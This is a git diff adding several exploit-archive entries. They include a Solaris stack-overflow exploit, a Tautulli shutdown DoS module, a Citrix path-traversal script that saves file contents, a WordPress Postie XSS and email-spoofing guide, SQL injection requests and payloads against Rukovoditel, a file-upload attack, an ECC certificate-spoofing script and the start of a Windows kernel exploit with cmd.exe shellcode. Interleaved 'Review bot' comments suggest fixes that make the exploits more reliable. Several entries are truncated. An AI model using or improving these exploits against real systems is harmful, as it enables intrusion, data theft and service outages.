payload[PAYSIZE]; + char platform[256], release[256], display[256]; + int i, payaddr; + + char *arg[2] = {"foo", NULL}; + int sb = ((int)argv[0] | 0xfff); /* stack base */ + int ret = search_ldso("strcpy"); /* or sprintf */ + int rwx_mem = search_rwx_mem(); /* rwx memory */ + + FILE *fp; + char palette_file[BUFSIZE + 18]; + + /* print exploit information */ + fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); + + /* read command line */ + if (argc != 2) { + fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); + exit(1); + } + sprintf(display, "DISPLAY=%s", argv[1]); + + /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ + memset(payload, '\x90', PAYSIZE); + 
payload[PAYSIZE - 1] = 0x0; + memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); + + /* fill the envp, keeping padding */ + add_env(payload); + add_env(display); + add_env("HOME=/tmp"); + add_env(NULL); + + /* calculate the payload address */ + payaddr = sb - OFFSET; + + /* prepare the evil palette name */ + memset(buf, 'A', sizeof(buf)); + buf[sizeof(buf) - 1] = 0x0; + + /* fill with function address in ld.so.1, saved eip, and arguments */ + for (i = PADDING; i < BUFSIZE - 16; i += 4) { + set_val(buf, i, ret); /* strcpy */ + set_val(buf, i += 4, rwx_mem); /* saved eip */ + set_val(buf, i += 4, rwx_mem); /* 1st argument */ + set_val(buf, i += 4, payaddr); /* 2nd argument */ + } + + /* prepare the evil .Xdefaults file */ + fp = fopen("/tmp/.Xdefaults", "w"); + if (!fp) { + perror("error creating .Xdefaults file"); + exit(1); + } + fprintf(fp, "*0*ColorPalette: %s\n", buf); // or *0*MonochromePalette + fclose(fp); + + /* prepare the evil palette file (badchars currently not handled) */ + mkdir("/tmp/.dt", 0755); + mkdir("/tmp/.dt/palettes", 0755); + sprintf(palette_file, "/tmp/.dt/palettes/%s", buf); + fp = fopen(palette_file, "w"); + if (!fp) { + perror("error creating palette file"); + exit(1); + } + fprintf(fp, "Black\n"); + fclose(fp); + + /* print some output */ + sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); + sysinfo(SI_RELEASE, release, sizeof(release) - 1); + fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); + fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); + fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); + fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); + fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); + + /* run the vulnerable program */ + execve(VULN, arg, env); + perror("execve"); + exit(0); +} + +/* + * add_env(): add a variable to envp and pad if needed + */ +int add_env(char *string) +{ + int i; + + /* null termination */ + if (!string) { + 
env[env_pos] = NULL; + return env_len; + } + + /* add the variable to envp */ + env[env_pos] = string; + env_len += strlen(string) + 1; + env_pos++; + + /* pad the envp using zeroes */ + if ((strlen(string) + 1) % 4) + for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { + env[env_pos] = string + strlen(string); + env_len++; + } + + return env_len; +} + +/* + * check_zero(): check an address for the presence of a 0x00 + */ +void check_zero(int addr, char *pattern) +{ + if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || + !(addr & 0xff000000)) { + fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); + exit(1); + } +} + +/* + * search_ldso(): search for a symbol inside ld.so.1 + */ +int search_ldso(char *sym) +{ + int addr; + void *handle; + Link_map *lm; + + /* open the executable object file */ + if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { + perror("dlopen"); + exit(1); + } + + /* get dynamic load information */ + if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { + perror("dlinfo"); + exit(1); + } + + /* search for the address of the symbol */ + if ((addr = (int)dlsym(handle, sym)) == NULL) { + fprintf(stderr, "sorry, function %s() not found\n", sym); + exit(1); + } + + /* close the executable object file */ + dlclose(handle); + + check_zero(addr - 4, sym); + return addr; +} + +/* + * search_rwx_mem(): search for an RWX memory segment valid for all + * programs (typically, /usr/lib/ld.so.1) using the proc filesystem + */ +int search_rwx_mem(void) +{ + int fd; + char tmp[16]; + prmap_t map; + int addr = 0, addr_old; + + /* open the proc filesystem */ + sprintf(tmp,"/proc/%d/map", (int)getpid()); + if ((fd = open(tmp, O_RDONLY)) < 0) { + fprintf(stderr, "can't open %s\n", tmp); + exit(1); + } + + /* search for the last RWX memory segment before stack (last - 1) */ + while (read(fd, &map, sizeof(map))) + if (map.pr_vaddr) + if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { + addr_old = addr; + addr = map.pr_vaddr; 
+ } + close(fd); + + /* add 4 to the exact address NULL bytes */ + if (!(addr_old & 0xff)) + addr_old |= 0x04; + if (!(addr_old & 0xff00)) + addr_old |= 0x0400; + + return addr_old; +} + +/* + * set_val(): copy a dword inside a buffer (little endian) + */ +void set_val(char *buf, int pos, int val) +{ + buf[pos] = (val & 0x000000ff); + buf[pos + 1] = (val & 0x0000ff00) >> 8; + buf[pos + 2] = (val & 0x00ff0000) >> 16; + buf[pos + 3] = (val & 0xff000000) >> 24; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/47929.rb b/exploits/multiple/webapps/47929.rb new file mode 100755 index 000000000..a3aec5061 --- /dev/null +++ b/exploits/multiple/webapps/47929.rb @@ -0,0 +1,38 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service', + 'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.', + 'Author' => 'Ismail Tasdelen', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2019-19833'], + ['EDB', '47785'] + ] + ) + register_options([ Opt::RPORT(8181) ]) + end + + def run + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/shutdown' + }) + + if res + print_status("Request sent to #{rhost}") + else + print_status("No reply from #{rhost}") + end + rescue Errno::ECONNRESET + print_status('Connection reset') + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/47930.txt b/exploits/multiple/webapps/47930.txt new file mode 100644 index 000000000..a300fe02f --- /dev/null +++ b/exploits/multiple/webapps/47930.txt 
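Review bot: The six `# Exploit:` / `# Date:` / `# Author:` / `# Vendor:` / `# Software Link:` / `# CVE:` lines at the top of 47932.c sit outside the `/* ... */` block, so a C preprocessor reads them as directives and gcc (the compiler named in the usage comment) rejects the file with invalid-directive errors before anything else is looked at; move the header inside the comment block. In `search_rwx_mem()` `addr_old` is declared without an initializer (`int addr = 0, addr_old;`) and is only assigned inside the `while` loop, so when `/proc/%d/map` yields fewer than two matching segments the function returns an indeterminate value; `int addr = 0, addr_old = 0;` plus an explicit "no segment found" check before `return addr_old;` makes that path deterministic. The same loop condition `while (read(fd, &map, sizeof(map)))` treats the -1 error return as true, so an I/O error on the map file spins forever; compare against `sizeof(map)` instead. In `main()`, `sprintf(display, "DISPLAY=%s", argv[1])` copies an unbounded argument into a 256-byte buffer; `snprintf(display, sizeof(display), "DISPLAY=%s", argv[1])` is the usual fix.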
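Review bot: The `initialize` metadata in 47929.rb has no `'DisclosureDate'` and no `'Notes'` hash, so Metasploit cannot tell an operator up front that the module's only effect is to take the target service down; add `'DisclosureDate' => '<date from the referenced advisory>'` and `'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN] }` next to `'References'`. In `run`, `if res` is true for any HTTP response, so a 401 from an instance that requires authentication and a 200 from one that accepted the request are both reported as `Request sent to #{rhost}`; branching on `res.code` would make the status line accurate rather than misleading. The method-level `rescue Errno::ECONNRESET` is fine as written, but a one-line comment saying that a reset is the expected symptom of the service stopping would explain why it is reported with `print_status` rather than `print_error`.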
@@ -0,0 +1,130 @@ +# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal +# Date: 2019-12-17 +# CVE: CVE-2019-19781 +# Vulenrability: Path Traversal +# Vulnerablity Discovery: Mikhail Klyuchnikov +# Exploit Author: Dhiraj Mishra +# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 +# Vendor Homepage: https://www.citrix.com/ +# References: https://support.citrix.com/article/CTX267027 +# https://github.com/nmap/nmap/pull/1893 + +local http = require "http" +local stdnse = require "stdnse" +local shortport = require "shortport" +local table = require "table" +local string = require "string" +local vulns = require "vulns" +local nmap = require "nmap" +local io = require "io" + +description = [[ +This NSE script checks whether the traget server is vulnerable to +CVE-2019-19781 +]] +--- +-- @usage +-- nmap --script https-citrix-path-traversal -p +-- nmap --script https-citrix-path-traversal -p --script-args +output='file.txt' +-- @output +-- PORT STATE SERVICE +-- 443/tcp open http +-- | CVE-2019-19781: +-- | Host is vulnerable to CVE-2019-19781 +-- @changelog +-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) +-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) +-- @xmloutput +-- +-- Citrix ADC Path Traversal aka (Shitrix) +-- VULNERABLE +--
+-- Citrix Application Delivery Controller (ADC) and Gateway 10.5, +11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path +-- traversal vulnerability that allows attackers to read configurations or +any other file. +--
+-- +--
+-- 2019 +-- 17 +-- 12 +--
+-- +-- 17-12-2019 +-- +--
+-- +-- https://support.citrix.com/article/CTX267027 +-- https://nvd.nist.gov/vuln/detail/CVE-2019-19781 +--
+-- + +author = "Dhiraj Mishra (@RandomDhiraj)" +Discovery = "Mikhail Klyuchnikov (@__Mn1__)" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"discovery", "intrusive","vuln"} + +portrule = shortport.ssl + +action = function(host,port) + local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil + local vuln = { + title = 'Citrix ADC Path Traversal', + state = vulns.STATE.NOT_VULN, + description = [[ +Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, +12.1, and 13.0 are vulnerable +to a unauthenticated path traversal vulnerability that allows attackers to +read configurations or any other file. + ]], + references = { + 'https://support.citrix.com/article/CTX267027', + 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', + }, + dates = { + disclosure = {year = '2019', month = '12', day = '17'}, + }, + } + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + local path = "/vpn/../vpns/cfg/smb.conf" + local response + local output = {} + local success = "Host is vulnerable to CVE-2019-19781" + local fail = "Host is not vulnerable" + local match = "[global]" + local credentials + local citrixADC + response = http.get(host, port.number, path) + + if not response.status then + stdnse.print_debug("Request Failed") + return + end + if response.status == 200 then + if string.match(response.body, match) then + stdnse.print_debug("%s: %s GET %s - 200 OK", +SCRIPT_NAME,host.targetname or host.ip, path) + vuln.state = vulns.STATE.VULN + citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname +or host.ip,port.number, path)) + if outputFile then + credentials = response.body:gsub('%W','.') +vuln.check_results = stdnse.format_output(true, citrixADC) + vuln.extra_info = stdnse.format_output(true, "Credentials are being +stored in the output file") +file = io.open(outputFile, "a") +file:write(credentials, "\n") + else + vuln.check_results = stdnse.format_output(true, citrixADC) + end + 
end + elseif response.status == 403 then + stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname +or host.ip, path, response.status) + vuln.state = vulns.STATE.NOT_VULN + end + + return vuln_report:make_output(vuln) +end \ No newline at end of file diff --git a/exploits/php/webapps/47925.txt b/exploits/php/webapps/47925.txt new file mode 100644 index 000000000..47044e2b1 --- /dev/null +++ b/exploits/php/webapps/47925.txt @@ -0,0 +1,85 @@ +# Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting +# Google Dork: inurl:/wp-content/plugins/postie/readme.txt +# Date: 2020-01-15 +# Exploit Author: V1n1v131r4 +# Vendor Homepage: https://postieplugin.com/ +# Software Link: https://wordpress.org/plugins/postie/#developers +# Version: <=1.9.40 +# Tested on: Linux +# CVE : CVE-2019-20203, CVE-2019-20204 + +## Identifying WordPress Postie Plugin installation + +#!/bin/bash if curl -s -o /dev/null -w "%{http_code}" http:///wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then echo "" echo "Postie installed!" else echo "" echo "Postie seems not to be installed" fi + +## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204) + +# the syntax below should go as email body + +jaVasCript:/*--> + +## Email to post on Postie + +- Identifying the mail server + + dig domain.com mx + +- enumerating accounts via SMTP + + telnet domain.com 587 + EHLO buddy + mail from: + rcpt to: + vrfy user@domain.com + + +- listing accounts via third party software + + You can use these third party software and APIs to enumerate target email users: + - https://www.zerobounce.net + - https://tools.verifyemailaddress.io/ + - https://hunter.io/email-verifier + + + +## Spoofing with PHPMailer + + +Mail sent!'; + else echo '

Something went wrong...

'; + + + // FULL HEADER + // $headers = "From: testsite < mail@testsite.com >\n"; + // $headers .= "Cc: testsite < mail@testsite.com >\n"; + // $headers .= "X-Sender: testsite < mail@testsite.com >\n"; + // $headers .= 'X-Mailer: PHP/' . phpversion(); + // $headers .= "X-Priority: 1\n"; + // $headers .= "Return-Path: mail@testsite.com\n"; + // $headers .= "MIME-Version: 1.0\r\n"; + // $headers .= "Content-Type: text/html; charset=iso-8859-1\n"; + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/47926.txt b/exploits/php/webapps/47926.txt new file mode 100644 index 000000000..b953dbaf5 --- /dev/null +++ b/exploits/php/webapps/47926.txt 
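Review bot: The header lists both CVE-2019-20203 and CVE-2019-20204, but the body only labels the SVG polyglot step as CVE-2019-20204 and never says which step, if any, demonstrates CVE-2019-20203; a section line such as `## <affected field/step> (CVE-2019-20203)` would let a reader map each payload to its CVE. The detection one-liner requests `http:///wp-content/plugins/postie/readme.txt`, which has no host (presumably a placeholder lost in formatting) and should read `http://<target>/wp-content/plugins/postie/readme.txt`. The polyglot payload line and the PHPMailer section also appear truncated in this view, so the steps cannot be followed end to end as written; the precondition implied by the spoofing section — that the forged sender must be an address Postie is configured to accept posts from — should be stated explicitly rather than left to inference.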
@@ -0,0 +1,45 @@ +# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection +# Google Dork: N/A +# Date: 2020-01-15 +# Blog: https://fatihhcelik.blogspot.com/ +# Exploit Author: Fatih Çelik +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://sourceforge.net/projects/rukovoditel/ +# Version: 2.5.2 +# Tested on: Kali Linux +# CVE : N/A + +# Request, + +POST /ruko/index.php?module=items/listing HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ruko/index.php?module=reports/view&reports_id=68%27 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 330 +Connection: close +Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver + +redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 + +# PAYLOADS, + +# Parameter: reports_id (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + +Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' RLIKE (SELECT (CASE WHEN (9654=9654) THEN 68 ELSE 0x28 END))-- AlKt&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 + +# Type: error-based +# Title: MySQL >= 5.0 AND 
error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 8112 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(8112=8112,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rVyr&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 4324 FROM (SELECT(SLEEP(5)))KySi)-- Pfwf&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 \ No newline at end of file diff --git a/exploits/php/webapps/47928.txt b/exploits/php/webapps/47928.txt new file mode 100644 index 000000000..1677bb8d2 --- /dev/null +++ b/exploits/php/webapps/47928.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload +# Google Dork: N/A +# Date: 2020-01-16 +# Exploit Author: Or4nG.M4n aka S4udiExploit +# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ +# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip +# Version: 1.0 +# Tested on: MY MIND v1.23.45 +# CVE: N/A +# WWW . SEC4EVER . COM + -> hola amigos ^.^ + -> just copy this html code +
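Review bot: The header never states the privilege needed, yet the recorded request carries a `sid` session cookie (plus `hblid`/`olfsk` tracker cookies), so this appears to be a post-authentication injection reachable only with a valid Rukovoditel session; add `# Authentication: required (valid user session; minimum role not verified)` under `# Version: 2.5.2` and strip the live cookie values before publishing. The `Referer` shows `reports_id=68%27` on the `reports/view` GET, which hints the same parameter may be injectable on that path as well, but nothing in the hunk confirms it, so if mentioned it should be marked untested. The payloads are raw sqlmap output with unencoded quotes, spaces and `--`, while the recorded body encodes `search_keywords`; a note to URL-encode the payload before sending would avoid failed reproductions.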
+ + + + +
+ -> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php +# i think am back %^_^% +# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com +# big thanks to Stupid Coder ^.^ \ No newline at end of file diff --git a/exploits/php/webapps/47931.txt b/exploits/php/webapps/47931.txt new file mode 100644 index 000000000..e76004576 --- /dev/null +++ b/exploits/php/webapps/47931.txt 
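Review bot: The hunk names neither the upload endpoint nor the form field that accepts the file; the only concrete detail is the resulting path `/store/bootstrap/img/[FILE].php`, and the HTML form between `-> just copy this html code` and `-> after you upload` is empty in this view, so the PoC cannot be reproduced from the text alone. A header line such as `# Vulnerable endpoint: <script> ; file parameter: <name> ; extension/type check: none observed` would keep the advisory self-contained even if the form is lost again. The `# Tested on: MY MIND v1.23.45` field should carry a real platform so the index stays useful.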
@@ -0,0 +1,48 @@ +# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection +# Google Dork: N/A +# Date: 2020-01-15 +# Blog: https://fatihhcelik.blogspot.com/ +# Exploit Author: Fatih Çelik +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://sourceforge.net/projects/rukovoditel/ +# Version: 2.5.2 +# Tested on: Kali Linux +# CVE : N/A + + + +# Request, +GET /ruko/index.php?module=entities/fields&entities_id=25 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ruko/index.php?module=entities/fields&entities_id=25 +Connection: close +Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +# PAYLOADS, + +# Parameter: entities_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause + +Payload: module=entities/fields&entities_id=25' AND 2091=2091 AND 'emRY'='emRY + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: module=entities/fields&entities_id=25' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(2023=2023,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZZpM'='ZZpM + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: module=entities/fields&entities_id=25' AND (SELECT 5681 FROM (SELECT(SLEEP(5)))rdOz) AND 'vWza'='vWza + +# Type: UNION query +# Title: Generic UNION query (NULL) - 23 columns + +Payload: module=entities/fields&entities_id=25' UNION ALL SELECT 
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706a71,0x5a664143527068525459496254624c514e45694d42776a6d67614a68434c6762434f62514d4f4566,0x7162787871),NULL-- syQw \ No newline at end of file diff --git a/exploits/php/webapps/47934.txt b/exploits/php/webapps/47934.txt new file mode 100644 index 000000000..56af517fa --- /dev/null +++ b/exploits/php/webapps/47934.txt 
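Review bot: The `entities_id` payloads are written with raw apostrophes, spaces and `--` although the parameter travels in the GET query string, where the recorded request already uses the encoded form; they should be stated percent-encoded, e.g. `entities_id=25%27%20AND%202091%3D2091%20AND%20%27emRY%27%3D%27emRY`, or the text should say to encode before sending. The 23-column `UNION ALL SELECT NULL,...` is specific to the query behind `entities/fields` in 2.5.2 and will need re-counting on other versions; a sentence saying so avoids false negatives. As the recorded request carries a `sid` session cookie, the header should also state that an authenticated session is required (the role needed is not shown).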
@@ -0,0 +1,57 @@ +# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection +# Google Dork: N/A +# Date: 2020-01-15 +# Blog: https://fatihhcelik.blogspot.com/ +# Exploit Author: Fatih Çelik +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://sourceforge.net/projects/rukovoditel/ +# Version: 2.5.2 +# Tested on: Kali Linux +# CVE : N/A + +# Request, + +POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 125 +Connection: close +Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver + +page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D= + + +# PAYLOADS, + +# Parameter: filters[1][value] (POST) +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm + +# Parameter: filters[0][value] (POST) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING 
clause (MySQL comment) + +Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1 + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1 + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1 \ No newline at end of file diff --git a/exploits/windows/local/47933.rb b/exploits/windows/local/47933.rb new file mode 100755 index 000000000..19f2d24a4 --- /dev/null +++ b/exploits/windows/local/47933.rb @@ -0,0 +1,23 @@ +# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip + +require 'openssl' + +raw = File.read "ca.crt" +ca_cert = OpenSSL::X509::Certificate.new(raw) + +# Parse public key from CA +ca_key = ca_cert.public_key +if !(ca_key.instance_of? OpenSSL::PKey::EC) then + puts "CA NOT ECC" + puts "Type: " + key.inspect + exit +end + +# Set new group with fake generator G = Q +ca_key.private_key = 1 +group = ca_key.group +group.set_generator(ca_key.public_key, group.order, group.cofactor) +group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE +ca_key.group = group + +puts ca_key.to_pem \ No newline at end of file diff --git a/exploits/windows_x86-64/local/47935.cpp b/exploits/windows_x86-64/local/47935.cpp new file mode 100644 index 000000000..3e98bd130 --- /dev/null +++ b/exploits/windows_x86-64/local/47935.cpp 
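Review bot: The injection point is `module=tools/users_login_log`, a login-audit tool that is presumably exposed only to administrative users, and the recorded request carries a `sid` session cookie, so the header should say what privilege the attacker needs (e.g. `# Authentication: required; tested from an administrator session`) — otherwise readers may assume an unauthenticated SQLi and overstate the severity. The boolean payload `filters[0][value]=-6686' OR 4511=4511#` relies on `#` as a MySQL comment; that is fine in a form body, but if copied into a URL it becomes a fragment and must be sent as `%23`. The error-based and time-based payloads also change `filters[0][value]` from the recorded `1` to `0` without explanation; a short remark would stop readers wondering whether it matters.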
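Review bot: The non-ECC branch references an undefined local, `puts "Type: " + key.inspect`, so feeding the script an RSA CA certificate raises a NameError instead of printing the key type; it should be `puts "Type: " + ca_key.inspect`. The mutation path (`ca_key.private_key = 1`, `ca_key.group = group`) depends on setters that `OpenSSL::PKey::EC` exposes only in older Ruby `openssl` bindings; if the target gem has made PKey objects immutable (as recent releases have, to my knowledge), these calls raise, so the script should state the Ruby/openssl version it was tested with or build the key from ASN.1 instead. It also reads `ca.crt` from the current directory with no usage message; `raw = File.read(ARGV[0] || "ca.crt")` would make the input explicit.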
@@ -0,0 +1,707 @@ +/* +The exploit works on 19H1. +It was tested with ntoskrnl version 10.0.18362.295 + +EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47935.zip +*/ + +#include +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "ntdll.lib") + +// run cmd.exe +unsigned char shellcode[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \ +"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \ +"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \ +"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \ +"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \ +"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \ +"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \ +"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \ +"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \ +"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \ +"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \ +"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \ 